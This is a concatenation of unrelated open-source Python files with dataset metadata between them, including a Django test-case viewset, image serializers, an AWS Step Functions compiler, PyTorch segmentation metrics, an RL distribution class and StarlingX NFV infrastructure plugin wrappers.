    # 'moduleid__projcet__project_name' would filter by project name
    # moduleid__projcet traverses the parent foreign key; moduleid is the direct foreign key
    # Exact-match filtering
filter_fields = ('moduleid__projcet', 'moduleid', 'title', 'casename', 'isdone', 'maintainer',)
    # Override which serializer class is used for responses
def get_serializer_class(self):
if self.action == 'list':
return CaseListSerializer
else:
return CaseSerializer
def create(self, request, *args, **kwargs):
        # Check whether the test case already exists
is_title = Case.objects.filter(moduleid=request.data['moduleid'], title=request.data['title']).count()
if is_title:
print("用列已经存在")
return JsResponse(data=[], msg="用列已经存在", code=300)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
data = serializer.data
print("新增用列成功")
return JsResponse(data=data, msg="新增用列成功", headers=headers, code=200)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
print("删除成功")
return JsResponse(data=[], msg="删除成功", code=200)
| 32.530303
| 110
| 0.701444
|
28b27029a6b705de9f59ec4b3540702778c1f686
| 2,036
|
py
|
Python
|
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from taggit_serializer.serializers import (TagListSerializerField,
TaggitSerializer)
from . import models
from flipsidegram.users import models as user_models
class SmallImageSerializer(serializers.ModelSerializer):
""" Used for the notifications """
class Meta:
model = models.Image
fields = (
'file',
)
class CountImageSerializer(serializers.ModelSerializer):
class Meta:
model = models.Image
fields = (
'id',
'file',
'comment_count',
'like_count'
)
class FeedUserSerializer(serializers.ModelSerializer):
class Meta:
model = user_models.User
fields = (
'username',
'profile_image'
)
class CommentSerializer(serializers.ModelSerializer):
creator = FeedUserSerializer(read_only=True)
class Meta:
model = models.Comment
fields = (
'id',
'message',
'creator'
)
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = models.Like
fields = '__all__'
class ImageSerializer(TaggitSerializer, serializers.ModelSerializer):
comments = CommentSerializer(many=True)
creator = FeedUserSerializer()
tags = TagListSerializerField()
class Meta:
model = models.Image
fields = (
'id',
'file',
'location',
'caption',
'comments',
'like_count',
'creator',
'tags',
'created_at'
)
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = models.Like
fields = (
'creator',
)
class InputImageSerializer(serializers.ModelSerializer):
class Meta:
model = models.Image
fields = (
'file',
'location',
'caption',
)
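A brief usage sketch for the read serializer above; the queryset is ordinary Django/DRF usage and not specific to this project.

# Illustrative only: serialize all images for a feed-style response
images = models.Image.objects.all()
serializer = ImageSerializer(images, many=True)
payload = serializer.data  # list of dicts with the fields declared above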
| 20.565657
| 69
| 0.557466
|
15ffeaa8fbc745b677e9821a8c42f316cfae3c33
| 11,231
|
py
|
Python
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 36
|
2017-01-27T21:28:50.000Z
|
2022-03-15T12:29:01.000Z
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 10
|
2017-05-03T17:15:30.000Z
|
2021-01-07T22:55:08.000Z
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 13
|
2017-05-18T15:02:10.000Z
|
2021-07-27T23:09:54.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import json
from collections import OrderedDict
import iso8601 # parser for timestamp format
from .ast import ASTStateChoice, ASTCompOp, ASTCompNot, ASTCompAndOr, ASTValue, ASTModNext, ASTStepFunction
class Timestamp(object):
"""Wrapper around a timestamp string.
Used to determine if a string is in a valid timestamp format and type it
for the parser
"""
def __init__(self, timestamp):
"""
Args:
timestamp (string): Timestamp string
Exceptions:
An exception is thrown if the string is not a valid timestamp
"""
iso8601.parse_date(timestamp)
self.timestamp = timestamp
def __str__(self):
return self.timestamp
def __repr__(self):
return "Timestamp({!r})".format(self.timestamp)
class _StateMachineEncoder(json.JSONEncoder):
"""Custom JSONEncoder that handles the Timestamp type"""
def default(self, o):
if type(o) == Timestamp:
return str(o)
return super(_StateMachineEncoder, self).default(o)
class Branch(dict):
def __init__(self, ast):
super(Branch, self).__init__()
        # Use an OrderedDict so states are dumped in the same order they were
        # added, making it easier to read the output and match it to the input
self['States'] = OrderedDict()
for state in ast.states:
self['States'][state.name] = State(state)
self['StartAt'] = ast.states[0].name
class StepFunction(Branch):
def __init__(self, ast):
super(StepFunction, self).__init__(ast)
if ast.comment is not None:
self['Comment'] = ast.comment.value
if ast.version is not None:
self['Version'] = ast.version.value.value
if ast.timeout is not None:
self['TimeoutSeconds'] = ast.timeout.value.value
def definition(self, **kwargs):
"""Dump the state machine into the JSON format needed by AWS
Args:
kwargs (dict): Arguments passed to json.dumps()
"""
kwargs.setdefault('ensure_ascii', False) # Allow Unicode in the output by default
return json.dumps(self, cls=_StateMachineEncoder, **kwargs)
class State(dict):
def __init__(self, ast):
super(State, self).__init__()
self['Type'] = ast.state_type
# Generic Modifiers for all States
if ast.comment is not None:
# No longer a token, parsed by AST class into name/comment
self['Comment'] = ast.comment
if ast.timeout is not None:
timeout = ast.timeout.value.value
self['TimeoutSeconds'] = timeout
else:
timeout = 60 # default
if ast.heartbeat is not None:
heartbeat = ast.heartbeat.value.value
if not heartbeat < timeout:
ast.heartbeat.raise_error("Heartbeat must be less than timeout (defaults to 60)")
self['HeartbeatSeconds'] = heartbeat
if ast.input is not None:
self['InputPath'] = ast.input.value.value
if ast.result is not None:
self['ResultPath'] = ast.result.value.value
if ast.output is not None:
self['OutputPath'] = ast.output.value.value
if ast.data is not None:
self['Result'] = ast.data.value
if ast.catch is not None:
self['Catch'] = []
for catch in ast.catch:
self['Catch'].append(Catch(catch))
if ast.retry is not None:
self['Retry'] = []
for retry in ast.retry:
self['Retry'].append(Retry(retry))
if ast.iterator is not None:
# The iterator contains a separate state machine that runs on each
# element of the input array.
substates = [b for b in ast.iterator.states]
self['Iterator'] = StepFunction(ASTStepFunction(None, None, None, substates))
if ast.items_path is not None:
self['ItemsPath'] = ast.items_path.value.value
if ast.max_concurrency is not None:
max_con = ast.max_concurrency.value.value
if max_con < 0:
ast.max_concurrency.raise_error("max_concurrency must be non-negative")
self['MaxConcurrency'] = max_con
# State specific arguments
if ast.state_type == 'Fail':
self['Error'] = ast.error.value
self['Cause'] = ast.cause.value
if ast.state_type == 'Pass' or ast.state_type == 'Map':
if ast.parameters is not None:
self['Parameters'] = Parameters(ast.parameters)
if ast.state_type == 'Task':
self['Resource'] = ast.arn
if ast.parameters is not None:
self['Parameters'] = Parameters(ast.parameters)
if ast.state_type == 'Wait':
key = ''.join([t.capitalize() for t in ast.type.value.split('_')])
self[key] = ast.val.value
if ast.state_type == 'Choice':
key = ASTStateChoice.DEFAULT
if key in ast.branches:
self['Default'] = ast.branches[key]
del ast.branches[key]
self['Choices'] = []
for comp in ast.branches:
self['Choices'].append(Choice(comp, ast.branches[comp]))
if ast.state_type == 'Parallel':
self['Branches'] = []
for branch in ast.branches:
self['Branches'].append(Branch(branch))
if ast.next is not None:
if isinstance(ast.next, ASTModNext):
self['Next'] = ast.next.value
else:
self['Next'] = ast.next
if ast.end:
self['End'] = ast.end
class Catch(dict):
def __init__(self, ast):
super(Catch, self).__init__()
errors = ast.errors
# Support a single string for error type
# ??? put this transformation in AST
if type(errors) != list:
errors = [errors]
if len(errors) == 0:
errors = [ASTValue('States.ALL', None)]
self['ErrorEquals'] = [e.value for e in errors]
self['Next'] = ast.next
if ast.path is not None:
self['ResultPath'] = ast.path.value
class Retry(dict):
def __init__(self, ast):
super(Retry, self).__init__()
errors = ast.errors
# Support a single string for error type
# ??? put this transformation in AST
if type(errors) != list:
errors = [errors]
if len(errors) == 0:
errors = [ASTValue('States.ALL', None)]
if float(ast.backoff.value) < 1.0:
ast.backoff.raise_error("Backoff rate should be >= 1.0")
self['ErrorEquals'] = [e.value for e in errors]
self['IntervalSeconds'] = ast.interval.value
self['MaxAttempts'] = ast.max.value
self['BackoffRate'] = float(ast.backoff.value)
def Parameters(ast):
rst = OrderedDict()
for k,v in ast.items():
# Keys are ASTValues and need to have the actual value unwrapped
# Values are already raw values as they are JSON Text
rst[k.value] = v
return rst
COMPARISON = {
'==': {
str: 'StringEquals',
int: 'NumericEquals',
float: 'NumericEquals',
bool: 'BooleanEquals',
Timestamp: 'TimestampEquals',
},
'<': {
str: 'StringLessThan',
int: 'NumericLessThan',
float: 'NumericLessThan',
Timestamp: 'TimestampLessThan',
},
'>': {
str: 'StringGreaterThan',
int: 'NumericGreaterThan',
float: 'NumericGreaterThan',
Timestamp: 'TimestampGreaterThan',
},
'<=': {
str: 'StringLessThanEquals',
int: 'NumericLessThanEquals',
float: 'NumericLessThanEquals',
Timestamp: 'TimestampLessThanEquals',
},
'>=': {
str: 'StringGreaterThanEquals',
int: 'NumericGreaterThanEquals',
float: 'NumericGreaterThanEquals',
Timestamp: 'TimestampGreaterThanEquals',
},
}
try:
for op in COMPARISON.keys():
COMPARISON[op][unicode] = COMPARISON[op][str]
except NameError:
    pass  # Python 3 has no separate unicode type; the mapping above only applies on Python 2
def Choice(ast, target=None):
if type(ast) == ASTCompOp:
var = ast.var.value
val = ast.val.value
op = ast.op.value
op_type = type(val) # The type of the operator is based on the value type
try:
if op == '!=':
op = COMPARISON['=='][op_type]
choice = OpChoice(var, op, val)
return NotChoice(choice, target)
else:
op = COMPARISON[op][op_type]
return OpChoice(var, op, val, target)
except KeyError:
msg = "Cannot make '{}' comparison with type '{}'".format(op, op_type)
ast.raise_error(msg)
elif type(ast) == ASTCompNot:
return NotChoice(Choice(ast.comp), target)
elif isinstance(ast, ASTCompAndOr):
return AndOrChoice(ast, target)
else:
ast.raise_error("Comparison support not implemented yet")
class OpChoice(dict):
"""A ChoiceState Choice wrapping a comparison and reference to state to execute"""
def __init__(self, var, op, val, target=None):
super(OpChoice, self).__init__(Variable = var)
self.op = op # for __str__ / __repr__
self[self.op] = val
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
return "({} {} {})".format(self['Variable'], self.op, self[self.op])
class NotChoice(dict):
"""Wraper around a Choice that negates the Choice"""
def __init__(self, comp, target=None):
super(NotChoice, self).__init__(Not = comp)
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
return "(Not {!r})".format(self['Not'])
class AndOrChoice(dict):
"""Wrapper arounds a list of Choices and 'and's or 'or's the results together"""
def __init__(self, ast, target=None):
super(AndOrChoice, self).__init__()
self.op = ast.op # for __str__ / __repr__
self[self.op] = [Choice(comp) for comp in ast.comps]
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
vals = map(repr, self[self.op])
return "(" + (" {} ".format(self.op.lower())).join(vals) + ")"
| 31.371508
| 107
| 0.590954
|
8eba515d20b05887befb9ca97672bfad36cb65f9
| 2,320
|
py
|
Python
|
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | null | null | null |
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | 5
|
2020-11-13T18:54:36.000Z
|
2021-09-08T02:06:06.000Z
|
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | null | null | null |
import torch
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import *
import seaborn as sns
sns.set()
# Accuracy
# def binary_acc(y_pred, y_test):
# y_pred_tag = torch.round(y_pred)
# correct_results_sum = (y_pred_tag == y_test).sum().float()
# acc = correct_results_sum/y_test.shape[0]
# acc = torch.round(acc * 100)
# return acc
def binary_acc(y_pred, y_test):
y_pred_tag = torch.round(y_pred)
correct_results_sum = (y_pred_tag.view(-1) == y_test.view(-1)).sum().float()
#print((y_pred_tag.view(-1) == y_test.view(-1)).size())
#print(correct_results_sum)
acc = correct_results_sum/y_test.view(-1).shape[0]
acc = torch.round(acc * 100)
return acc
# Plot the confusion matrix and print a full classification report
def plot_conf_matrix(y_true, y_pred):
print(classification_report(y_true, y_pred))
cf = pd.DataFrame(confusion_matrix(y_true, y_pred))
    plt.figure(figsize=(10, 10))
    ax = plt.subplot()
sns.set(font_scale=1.4)
sns.heatmap(cf, annot=True, ax = ax,cmap='Blues',fmt='d')
ax.set_ylabel('Actual')
ax.set_xlabel('Predicted')
ax.set_ylim([0,2])
# Intersection over Union for object detection
def inter_over_union_simple(y_pred, y_test, smooth = 1):
intersection = torch.min(y_pred, y_test)
union = y_pred + y_test - intersection
iou = torch.mean(intersection/union)
return iou * 100
# Intersection over Union for segmentation
def inter_over_union(y_pred, y_test, smooth = 1):
y_pred_tag = torch.round(y_pred)
conf_matrix = confusion_matrix(y_pred_tag.view(-1).cpu().detach().numpy(),y_test.view(-1).cpu().detach().numpy())
#print(conf_matrix)
intersection = np.diag(conf_matrix)
predicted = conf_matrix.sum(axis = 1)
target = conf_matrix.sum(axis = 0)
union = predicted + target - intersection
iou = np.mean(intersection/union)
return iou * 100
# Dice loss (1 - Dice coefficient) combined with the supplied criterion
def dice_coef(y_pred, y_test, criterion, epsilon=1e-6):
    # `y_pred_thr` was undefined in the original; assumed to be the thresholded prediction
    y_pred_thr = torch.round(y_pred)
    numerator = 2. * torch.sum(y_pred_thr * y_test, 1) + epsilon
    # denominator = torch.sum(torch.square(y_pred) + torch.square(y_test), 1)
    denominator = torch.sum(y_pred + y_test, 1)
    return 1 - torch.mean(numerator / (denominator + epsilon)) + criterion(y_pred, y_test)
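A quick toy check of the simple IoU metric above; the tensor values are chosen only so that every elementwise union is non-zero.

y_pred = torch.tensor([0.5, 1.0, 0.2])
y_test = torch.tensor([1.0, 1.0, 0.4])
# intersection = [0.5, 1.0, 0.2], union = [1.0, 1.0, 0.4] -> mean ratio ~0.667
print(inter_over_union_simple(y_pred, y_test))  # ~66.67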
| 33.142857
| 117
| 0.69569
|
1ec81cee374e638e8b16a21c06068a2328179d40
| 3,527
|
py
|
Python
|
src/garage/tf/distributions/recurrent_categorical.py
|
arbenton/garage
|
5c398255fbfae375370483f18216996d82590a88
|
[
"MIT"
] | 1
|
2020-01-05T14:57:43.000Z
|
2020-01-05T14:57:43.000Z
|
src/garage/tf/distributions/recurrent_categorical.py
|
lywong92/garage
|
96cb8887fcae90531a645d540653010e7fe10fcc
|
[
"MIT"
] | null | null | null |
src/garage/tf/distributions/recurrent_categorical.py
|
lywong92/garage
|
96cb8887fcae90531a645d540653010e7fe10fcc
|
[
"MIT"
] | 1
|
2020-02-05T00:34:07.000Z
|
2020-02-05T00:34:07.000Z
|
import numpy as np
import tensorflow as tf
from garage.tf.distributions.base import Distribution
from garage.tf.distributions.categorical import Categorical
TINY = 1e-8
class RecurrentCategorical(Distribution):
def __init__(self, dim, name='RecurrentCategorical'):
self._cat = Categorical(dim, name)
self._dim = dim
self._name = name
@property
def dim(self):
return self._dim
def kl_sym(self, old_dist_info_vars, new_dist_info_vars, name=None):
"""
Compute the symbolic KL divergence of two categorical distributions
"""
with tf.name_scope(name, 'kl_sym',
[old_dist_info_vars, new_dist_info_vars]):
old_prob_var = old_dist_info_vars['prob']
new_prob_var = new_dist_info_vars['prob']
# Assume layout is N * T * A
return tf.reduce_sum(
old_prob_var *
(tf.log(old_prob_var + TINY) - tf.log(new_prob_var + TINY)),
axis=2)
def kl(self, old_dist_info, new_dist_info):
"""
Compute the KL divergence of two categorical distributions
"""
old_prob = old_dist_info['prob']
new_prob = new_dist_info['prob']
return np.sum(
old_prob * (np.log(old_prob + TINY) - np.log(new_prob + TINY)),
axis=2)
def likelihood_ratio_sym(self,
x_var,
old_dist_info_vars,
new_dist_info_vars,
name=None):
with tf.name_scope(name, 'likelihood_ratio_sym',
[x_var, old_dist_info_vars, new_dist_info_vars]):
old_prob_var = old_dist_info_vars['prob']
new_prob_var = new_dist_info_vars['prob']
# Assume layout is N * T * A
a_dim = tf.shape(x_var)[2]
flat_ratios = self._cat.likelihood_ratio_sym(
tf.reshape(x_var, tf.stack([-1, a_dim])),
dict(prob=tf.reshape(old_prob_var, tf.stack([-1, a_dim]))),
dict(prob=tf.reshape(new_prob_var, tf.stack([-1, a_dim]))))
return tf.reshape(flat_ratios, tf.shape(old_prob_var)[:2])
def entropy(self, dist_info):
probs = dist_info['prob']
return -np.sum(probs * np.log(probs + TINY), axis=2)
def entropy_sym(self, dist_info_vars, name=None):
with tf.name_scope(name, 'entropy_sym', [dist_info_vars]):
probs = dist_info_vars['prob']
return -tf.reduce_sum(probs * tf.log(probs + TINY), 2)
def log_likelihood_sym(self, xs, dist_info_vars, name=None):
with tf.name_scope(name, 'log_likelihood_sym', [xs, dist_info_vars]):
probs = dist_info_vars['prob']
# Assume layout is N * T * A
a_dim = tf.shape(probs)[2]
flat_logli = self._cat.log_likelihood_sym(
tf.reshape(xs, tf.stack([-1, a_dim])),
dict(prob=tf.reshape(probs, tf.stack((-1, a_dim)))))
return tf.reshape(flat_logli, tf.shape(probs)[:2])
def log_likelihood(self, xs, dist_info):
probs = dist_info['prob']
        # Assume layout is N * T * A; this is the NumPy (non-symbolic) path,
        # so use the array shape and the non-symbolic log_likelihood
        a_dim = probs.shape[2]
        flat_logli = self._cat.log_likelihood(
            xs.reshape((-1, a_dim)), dict(prob=probs.reshape((-1, a_dim))))
return flat_logli.reshape(probs.shape[:2])
@property
def dist_info_specs(self):
return [('prob', (self.dim, ))]
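A small numeric sketch of the non-symbolic kl() above, using the N * T * A layout the code assumes (one trajectory, two timesteps, two actions); constructing the distribution is assumed not to require an active TensorFlow session.

dist = RecurrentCategorical(dim=2)
old = {'prob': np.array([[[0.9, 0.1], [0.5, 0.5]]])}
new = {'prob': np.array([[[0.5, 0.5], [0.5, 0.5]]])}
print(dist.kl(old, new))  # shape (1, 2): per-timestep KL divergence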
| 38.758242
| 77
| 0.581798
|
caa27ac05d36c4b5b4175c4462e181868e246451
| 17,360
|
py
|
Python
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common import debug
from nfv_vim.nfvi._nfvi_infrastructure_plugin import NFVIInfrastructurePlugin
DLOG = debug.debug_get_logger('nfv_vim.nfvi.nfvi_infrastructure_module')
_infrastructure_plugin = None
def nfvi_get_datanetworks(host_uuid, callback):
"""
Get host data network information
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_datanetworks',
host_uuid,
callback=callback)
return cmd_id
def nfvi_get_system_info(callback):
"""
Get information about the system
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_system_info',
callback=callback)
return cmd_id
def nfvi_get_system_state(callback):
"""
Get the state of the system
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_system_state',
callback=callback)
return cmd_id
def nfvi_get_hosts(callback):
"""
Get a list of hosts
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_hosts',
callback=callback)
return cmd_id
def nfvi_get_host(host_uuid, host_name, callback):
"""
Get host details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_get_host_devices(host_uuid, host_name, callback):
"""
Get host device list details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host_devices',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_get_host_device(host_uuid, host_name, device_uuid, device_name, callback):
"""
Get host device details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host_device',
host_uuid, host_name,
device_uuid, device_name,
callback=callback)
return cmd_id
def nfvi_host_device_image_update(host_uuid, host_name, callback):
"""
Update host device image
"""
cmd_id = _infrastructure_plugin.invoke_plugin('host_device_image_update',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_host_device_image_update_abort(host_uuid, host_name, callback):
"""
Abort host device image update
"""
cmd_id = _infrastructure_plugin.invoke_plugin('host_device_image_update_abort',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_kube_host_upgrade_control_plane(host_uuid, host_name, force, callback):
"""
Kube Host Upgrade Control Plane
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_host_upgrade_control_plane',
host_uuid,
host_name,
force,
callback=callback)
return cmd_id
def nfvi_kube_host_upgrade_kubelet(host_uuid, host_name, force, callback):
"""
Kube Host Upgrade Kubelet
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_host_upgrade_kubelet',
host_uuid,
host_name,
force,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_complete(callback):
"""Kube RootCA Update - Complete"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_complete',
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_generate_cert(expiry_date, subject, callback):
"""Kube RootCA Update - Generate Cert"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_generate_cert',
expiry_date=expiry_date,
subject=subject,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_host(host_uuid, host_name, update_type, callback):
"""Kube RootCA Update - Host"""
cmd_id = _infrastructure_plugin.invoke_plugin('kube_rootca_update_host',
host_uuid,
host_name,
update_type,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_pods(phase, callback):
"""Kube RootCA Update - Pods for a particular phase"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_pods',
phase,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_start(force, alarm_ignore_list, callback):
"""Kube RootCA Update - Start"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_start',
force=force,
alarm_ignore_list=alarm_ignore_list,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_upload_cert(cert_file, callback):
"""Kube RootCA Update - Upload Cert"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_upload_cert',
cert_file=cert_file,
callback=callback)
return cmd_id
def nfvi_kube_upgrade_cleanup(callback):
"""
Kube Upgrade Cleanup
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_cleanup',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_complete(callback):
"""
Kube Upgrade Complete
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_complete',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_download_images(callback):
"""
Kube Upgrade Download Images
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_download_images',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_networking(callback):
"""
Kube Upgrade Networking
"""
cmd_id = _infrastructure_plugin.invoke_plugin('kube_upgrade_networking',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_start(to_version, force, alarm_ignore_list, callback):
"""
Kube Upgrade Start
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_start',
to_version=to_version,
force=force,
alarm_ignore_list=alarm_ignore_list,
callback=callback)
return cmd_id
def nfvi_get_kube_host_upgrade_list(callback):
"""
Get kube host upgrade list
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_host_upgrade_list',
callback=callback)
return cmd_id
def nfvi_get_kube_rootca_host_update_list(callback):
"""
Get kube rootca update host list
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'get_kube_rootca_host_update_list',
callback=callback)
return cmd_id
def nfvi_get_kube_rootca_update(callback):
"""
Get kube rootca update
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_rootca_update',
callback=callback)
return cmd_id
def nfvi_get_kube_upgrade(callback):
"""
Get kube upgrade
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_upgrade',
callback=callback)
return cmd_id
def nfvi_get_kube_version_list(callback):
"""
Get kube version list
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_kube_version_list',
callback=callback)
return cmd_id
def nfvi_get_upgrade(callback):
"""
Get upgrade
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_upgrade',
callback=callback)
return cmd_id
def nfvi_upgrade_start(callback):
"""
Upgrade start
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_start',
callback=callback)
return cmd_id
def nfvi_upgrade_activate(callback):
"""
Upgrade activate
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_activate',
callback=callback)
return cmd_id
def nfvi_upgrade_complete(callback):
"""
Upgrade complete
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_complete',
callback=callback)
return cmd_id
def nfvi_disable_container_host_services(host_uuid, host_name,
host_personality, host_offline,
callback):
"""
Disable container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'disable_host_services',
host_uuid, host_name, host_personality, host_offline,
callback=callback)
return cmd_id
def nfvi_enable_container_host_services(host_uuid, host_name,
host_personality,
callback):
"""
Enable container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'enable_host_services',
host_uuid, host_name, host_personality,
callback=callback)
return cmd_id
def nfvi_delete_container_host_services(host_uuid, host_name,
host_personality,
callback):
"""
Delete container services on a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'delete_host_services',
host_uuid, host_name, host_personality,
callback=callback)
return cmd_id
def nfvi_notify_host_services_enabled(host_uuid, host_name, callback):
"""
Notify host services are enabled
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_enabled', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disabled(host_uuid, host_name, callback):
"""
Notify host services are disabled
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disabled', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disable_extend(host_uuid, host_name, callback):
"""
Notify host services disable extend timeout
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disable_extend', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_disable_failed(host_uuid, host_name,
reason, callback):
"""
Notify host services disable failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_disable_failed', host_uuid, host_name,
reason, callback=callback)
return cmd_id
def nfvi_notify_host_services_deleted(host_uuid, host_name, callback):
"""
Notify host services have been deleted
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_deleted', host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_notify_host_services_delete_failed(host_uuid, host_name,
reason, callback):
"""
Notify host services delete failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'notify_host_services_delete_failed', host_uuid, host_name,
reason, callback=callback)
return cmd_id
def nfvi_notify_host_failed(host_uuid, host_name, host_personality, callback):
"""
Notify host is failed
"""
cmd_id = _infrastructure_plugin.invoke_plugin('notify_host_failed',
host_uuid, host_name,
host_personality,
callback=callback)
return cmd_id
def nfvi_lock_host(host_uuid, host_name, callback):
"""
Lock a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('lock_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_unlock_host(host_uuid, host_name, callback):
"""
Unlock a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('unlock_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_reboot_host(host_uuid, host_name, callback):
"""
Reboot a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('reboot_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_upgrade_host(host_uuid, host_name, callback):
"""
Upgrade a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('upgrade_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_swact_from_host(host_uuid, host_name, callback):
"""
Swact from a host
"""
cmd_id = _infrastructure_plugin.invoke_plugin('swact_from_host', host_uuid,
host_name, callback=callback)
return cmd_id
def nfvi_get_alarms(callback):
"""
Get alarms
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_alarms', callback=callback)
return cmd_id
def nfvi_get_logs(start_period, end_period, callback):
"""
Get logs
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_logs', start_period,
end_period, callback=callback)
return cmd_id
